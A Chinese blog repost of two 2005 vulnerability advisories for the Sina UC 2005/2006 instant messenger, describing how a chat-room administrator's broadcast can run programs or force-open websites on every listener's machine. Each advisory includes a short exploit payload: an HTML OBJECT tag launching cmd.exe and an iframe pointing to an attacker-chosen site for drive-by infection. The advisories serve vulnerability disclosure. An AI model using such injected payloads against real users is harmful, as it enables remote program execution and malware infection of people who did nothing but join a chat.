以下消息来自幻影论坛[Ph4nt0m]邮件组。
献给大家一个SINA的UC漏洞。
详细内容见下面连接:
详细内容见下面连接:
[url]http://www.netcicala.com/article/sort014/sort035/info-151.html[/url]
新浪UC是国内较早投入研发的即时通讯软件。新浪UC一直秉承创新的理念,不断推陈出新。新浪UC集传统即时通信软件功能于一体,融合P2P思想的新一×××放式网络即时通信娱乐软件,将有声有色、图文并茂的场景聊天模式,以及视频电话、可断点续传的文件传输、能够多人聊天的多人世界,消息群发功能和在线游戏功能以及同学录(团体)等有机结合,形成一个完整的网上即时通讯娱乐平台,满足人们日常工作和生活的需要,给大家带来边说、边看、边玩的网络生活全新感觉。
****************************************
UC语音/视频聊天室漏洞:
****************************************
漏洞描述:
在UC聊天室内具有管理员权限,可以让在聊天室内的所有开广播的用户执行任意程序,恶意发送者并执行WINDOWS系统内的任何程序如记事本/注册表编辑器/记事本等等。
影响版本:
UC2005/2006。
漏洞补丁:
暂无。
补救措施:
屏蔽聊天室广播,并以文本形式显示广播。
严重程度:
**********非常严重***********
漏洞发现日期:
2005年11月
漏洞发现者:
网蝉
利用代码:
***者首先必须是聊天室的管理员,然后在聊天室内发送如下广播内容,则可使聊天室内所有聊友全部弹出CMD窗口。
<oBJECT classid="clsid:11111127-FC08-4373-8F54-1A02E3C15B7D" codebase="file://c:/windows/system32/cmd.exe"></oBJECT>
SINA 的UC的又一漏洞:
新浪UC是国内较早投入研发的即时通讯软件。新浪UC一直秉承创新的理念,不断推陈出新。新浪UC集传统即时通信软件功能于一体,融合P2P思想的新一×××放式网络即时通信娱乐软件,将有声有色、图文并茂的场景聊天模式,以及视频电话、可断点续传的文件传输、能够多人聊天的多人世界,消息群发功能和在线游戏功能以及同学录(团体)等有机结合,形成一个完整的网上即时通讯娱乐平台,满足人们日常工作和生活的需要,给大家带来边说、边看、边玩的网络生活全新感觉。
***************************************************************
UC语音/视频聊天室漏洞:
***************************************************************
漏洞描述:
首先在UC聊天室内要具有管理员权限,之后就可以在聊天时内发送漏洞利用代码,可以让在本聊天室内所有用户全部打开恶意发送者所指定的任意网站,如果网站内含有网页***,则本聊天室所有用户将会全部中马。
影响版本/系统:
UC2005/2006。
漏洞补丁:
暂无。
补救措施:
屏蔽聊天室广播,并以文本形式显示广播。
漏洞发现者:
网蝉
漏洞发现日期:
2005年11月
***************************************************************
利用代码:
运行代码后,
[url]http://www.netccicala.com/index.html[/url] 会被浏览器直接打开。如果网页中存在恶意代码,则聊天室内所有用户全部会被感染。
<iFRAME src="
[url]http://www.netccicala.com/index.html[/url]">
0
收藏
推荐专栏更多
猜你喜欢
我的友情链接
说极路由牛逼的人们,你们用过Tomato DualWAN吗?(三)
我们不得不面对的中年职场危机
职场终极密籍--记我的职业生涯
我的IT职场生涯: 毕业4年,月薪过万
年薪从0到10万-我的IT职场经验总结
致IT同仁 — IT人士常犯的17个职场错误
“跳槽加薪”现象,无奈的职场规则
职场观察:高薪需要什么?
关于基本工作素养在职场当中的重要性
驾驭你的“职场布朗运动”
30-35岁职场规划深谈,字字戳心
Kali Linux安装dvwa本地shentou测试环境
道路千万条,安全第一条——一次服务器安全处理经过
Hydra破解SSH端口
浅谈QOS服务访问质量
Cisco防火墙基础介绍及配置
【SRX】RE与PFE策略不同步,导致Commit失败-----案例分析
蚁剑xss漏洞,获取者shell
GandCrab5.0.9样本详细分析
扫一扫,领取大礼包
转载于:https://blog.51cto.com/netwalk/67505
Ctrl+Enter 发布
发布
取消